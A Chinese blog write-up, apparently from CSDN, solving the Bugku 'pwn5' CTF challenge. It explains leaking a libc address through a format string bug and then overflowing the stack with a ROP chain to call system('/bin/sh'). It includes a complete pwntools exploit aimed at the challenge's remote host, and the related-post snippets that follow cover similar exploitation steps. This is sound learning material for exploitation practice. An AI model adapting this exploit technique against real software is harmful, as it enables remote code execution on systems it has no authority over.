bugku-pwn5(萌新版)

最新推荐文章于 2023-01-13 19:39:06 发布
最新推荐文章于 2023-01-13 19:39:06 发布
阅读量819 收藏
点赞数 1
分类专栏: CTF Bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_30204577/article/details/105896065
版权

0x20 正文

用ida打开,右键(具体是由于插件还是7.0自带的,不是很清楚)查找格式化字符串,确实有找到。

main函数分析

在main里发现printf,s长度是20h,但是只能读取8,则存在溢出,而printf的参数是一个地址,则表明是格式化字符串漏洞。

碰到格式化字符串漏洞,我们就需要找找我们输入的参数或者是已存在的内容在程序里的偏移。

本题没有给libc,我们就需要leak libc,在这里我们选择leak_start_main

从图中可以看到,我们在printf下断点后,在栈中发现了libc_start_main,这里它的偏移是0x28,原因是:我们要找的是一个东西距离我们输入的内容处的偏移,大家知道,64位程序的第一个参数是rdi,也就是说我们需要求这个main到rdi的距离,是0x30-8=0x28

则start_main是距离我们输入的参数位置处的第:0x28/8+6=11,因为一个内容八个字节,6个寄存器。

这里面libc_main在程序中的地址是:

通过./find __libc_start_main 740可以找到对应的libc,然后通过dump命令就可以找到sys以及binsh的偏移,然后与libc_base相加

libc_base = read_addr - offset

0x30 exp

#-*- coding:utf-8 -*-
from pwn import *
context(os='linux', arch='amd64', log_level='debug') 
p = remote('114.116.54.89',10005)
p.recvuntil("?\n")
payload = "%11$p"
p.sendline(payload)
p.recvline()
libc_addr_main = p.recvuntil("%11$p")[:-6]
libc_base = int(libc_addr_main,16)-0x20830
sys = libc_base+ 0x45390
bin_sh = libc_base + 0x18cd57
pop_rdi = 0x400933

p.recvuntil("?\n")
payload1 = "鸽子"+'a'+"真香"
payload1 = payload1.ljust(0x20,'a')
payload1 += 'b'*8+p64(pop_rdi)+p64(bin_sh)+p64(sys)
p.sendline(payload1)
p.interactive()

exp就不需要解释了,主要是要弄懂原理,格式化字符串漏洞(目前,指我做的题目中,能理解)还是不难的。

OK,结束。

另外还学到几点:

mv str1 str2 将str1的名字改为str2
chmod 777 file 给权限
[BUGKU] [PWN] PWN5
Stan冲冲冲
05-18 457
[BUGKU] [PWN] PWN5 先下载文件,拉入UBUNTU,checksec检查一下 checksec human 架构是amd64,并开启了NX(堆栈可执行,16进制地址后六位不变,其余运行一次都会变) 在windows里把pwn2拉入64位ida 按F5切换到伪C 发现乱码,修改配置文件后ALT+A全部选上UTF-8,再按一次F5,中文就可以显示了 int __cdecl main(int argc, const char **argv, const char **envp) { char
BugkuCTF pwn题第一弹
weixin_43489686的博客
09-09 2201
BugkuCTF pwn题第一弹
Bugku pwn5
BengDouLove的博客
02-28 631
我怀着沉重的心情写这个blog,在我做出这道题之前费劲了千辛万苦,花了三天时间,思考加发呆加询问… 菜就不用说了。 好好记录一下吧。 代码中存在格式化字符串漏洞,具体运行起来是这样 这是第一个坑,%x与%p是有区别的,x输出四个字节,p输出八个字节,这是64位的程序,所以地址应该大于四个字节了。 之前一直用的%x最后泄露出来的地址不对,也很难发现。 (菜+1) 为什么是%11$p呢,这要从pri...
pwn5 - bugku
SkYe's Blog
11-02 889
pwn5 - bugku 本文并未真正意义上的writeup,因为我无法成功复现???只是单纯记录一下,做题笔记 首先看一下保护,只开了NX。 没有危险函数,如system、getshell等 main函数中的变量s,在read函数时可以造成溢出。当中的if条件是限制程序的第二次输入必须包含真香、鸽子两个字符串。 当中的重点是printf存在格式化字符串漏洞,我们可以从这里读取到main函...
Pwn5-bugku
yeshen4328的专栏
10-11 299
pwn5 基础知识 格式化字符串漏洞: 在c/c++的格式化输出中,使用的是printf函数,它的参数如下所示: int printf(const char *format, ...); 使用方式如下: char buf[10] = {}; read(0,buf,9); printf("%s",buf); 如果直接使用printf输出buf的话,则存在格式化字符串漏洞: char buf[10] = {}; read(0,buf,9); printf("%s",buf); 原理:因为printf
pwn刷题writeup(后续更新)
weixin_43342135的博客
08-12 1273
bugkupwn1: 这道题没啥说的, 直接在linu下执行语句:nc 114.116.54.89 10001, 再 ls 命令展示当下目录, 然后 cat flag 读取目标文件, 一般来说是flag这个文件有flag,但是也不排除其它的地方有flag。 Bugkupwn2: 第一步先nc上去程序,然后观看程序的作用。 传文件进入linux,再然后file pwn2,che...
CTFshow——DJBCTF(比赛记录之摸鱼的代价)
Npceer-一位网安初学者的博客
01-24 894
目录:没有(因为没怎么打,总共就写了几题) 这大吉杯挺不错的 就是我不行 我的水平 由于摸鱼等原因 与2个月前的HECTF 几乎没有变化 虽然我以为会有变化的 我都不敢说我是个web入门的新 这veryphp这么多写出来的 我看到一堆waf直接跑路了 MISC 也是在各种hint下 才能勉强切出几题 属实太菜了 我3个月的门 入的不如别人半个月 这个博客为了监督自己不摸鱼而记 也顺便记一下这几题misc 因为挺好玩的 我的签到!:手撕拼图yyds 第一次 照着群里大佬给的原图去拼 然后感觉时间不够直
Bugku pwn5 WP
至臻求学,胸怀云月
02-19 949
下载地址 url checksec [*] '/mnt/hgfs/ubuntu_share/pwn/bugku/human' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x...
bugku pwn5(栈溢出)
weixin_44954083的博客
12-11 1004
查看保护机制: 这个开了nx保护,堆栈不可以执行 拉到ida看一下: 这道题没有binsh和system两个后门,所以这个需要libc地址,在main函数看到了libc_start_main函数,这里需要得到libc_base地址,通过真实地址-偏移地址 这里得到是真实地址, 0x7ffff7a2d830-240=‘0x7ffff7a2d740’ 通过真实地址后面三位不变可以去得到偏移地...
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku pwn5(格式化字符串漏洞)
weixin_45097188的博客
10-09 1579
检查程序开启了哪些保护及位数 没有开始栈保护 读程序 发现没有system和bin/sh两个后门,需要返回到libc,但是有__libc_start_main函数,可以通过这个函数计算libc的基地址。 libc_start_main的偏移=0x28/8+6=11 思路:栈上格式化漏洞配合栈溢出漏洞,首先利用格式化泄漏libc地址,然后栈溢出执行system(’/bin/sh’) 利用pwn4...
bugku pwn5
发蝴蝶和大脑斧的博客
07-17 1650
参考writeup 首先发现第一次输入存在格式化字符串漏洞,泄露出栈上的__libc_start_main。这个是在start函数中入栈的,应该是每个程序都会进入main函数之前进行的操作。__libc_start_main是libc中的函数,可以泄露出加载libc的基地址。然后就是找服务器system地址和binsh地址,通过gadget赋值。 # -*- coding: utf-8 -*- f...
bugku-pwn-wp
令则
03-27 522
bugku 文章目录bugkupwn1pwn2pwn3pwn4pwn5 pwn1 这个是典型的新手题了,nc连上去就有shell, 直接可以拿到flag。 pwn2 main函数 这里我们看到read函数位置会出现一个典型的栈溢出。 然后我们计算下溢出位置到返回值之间的距离,就可以控制程序流程了, 接下来我们看到函数中存在一个get_shell_函数: 然后就可以着手写exp,这里简单写下pa...
bugku pwn1
PRCORANGE的博客
04-13 255
题目: nc 114.67.246.176 10846 nc:全称Netcat,用于连接远程服务器端口。连接后它会返回一个cmdshell用于执行命令(Linux自带该命令)。 在linux中连接服务器,再使用ls查看目录 cat flag
BugkuCTF练习平台pwn5(human)的writeup
只影的博客
03-04 988
这道题的思路相对简单,但是比较有代表性。 首先查看防护机制,发现只打开了NX。用ida打开题目,发现中文无法识别为字符串。这里需要用命令行打开ida,新建bat并编辑内容为D:\IDA_Pro_v7.0\ida64.exe -dCULTURE=all human即可。 漏洞有两处,第一处比较明显,是格式化字符串漏洞,如下所示。 memset(&s, 0, 0x20uLL); put...
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1865
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
CTFSHOW-PWN入门 pwn5
最新发布
01-10
### CTF SHOW PWN入门 pwn5 解法 对于CTF SHOW平台上的PWN挑战,尤其是针对`pwn5`这一题目,解决方法通常涉及对二进制漏洞的理解以及如何利用这些漏洞来获取flag。 #### 题目分析 在处理这类问题时,首先需要下载并理解目标程序的行为模式。通过逆向工程工具如IDA Pro或Ghidra可以查看可执行文件内部结构,识别潜在的安全缺陷[^1]。 #### 漏洞发现 经过初步审查后得知此题存在栈溢出的可能性。当输入长度超过缓冲区大小时未作适当检查便直接复制到固定空间内,这使得攻击者能够覆盖返回地址从而控制EIP寄存器指向任意位置执行恶意代码片段[^2]。 #### 利用技巧 为了成功完成该关卡,需构建特定格式的数据包作为输入发送给服务端进程。这里采用的方法是构造ROP链(Return-Oriented Programming Chain),即精心挑选一系列现有指令序列组合起来实现所需功能而不必注入额外shellcode: ```python from pwn import * context(os="linux", arch="amd64") binary_path = './path_to_binary' elf = ELF(binary_path) # 远程连接设置 host, port = "remote_host", 1234 conn = remote(host, int(port)) # 构造payload offset = ... # 计算偏移量 ret_address = ... pop_rdi_ret_gadget = ... payload = b'A' * offset + \ p64(pop_rdi_ret_gadget) + \ p64(target_function_arg) + \ p64(ret_address) conn.recvuntil(b'Tell me your name:') conn.sendline(payload) ``` 上述Python脚本展示了基本框架,实际应用中还需根据具体情况调整参数值,比如计算正确的偏移量(offset),找到合适的gadgets等[^3]。 #### 获取Flag 一旦成功触发了预期行为,则可以通过读取内存中的字符串或其他方式获得最终答案。例如,在某些情况下可能需要解析动态链接库表项以定位标准I/O函数的实际映射地址,进而打印出隐藏信息;而在另一些场景下则可能是直接调用了puts()之类的API输出预设好的标志位[^4]。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值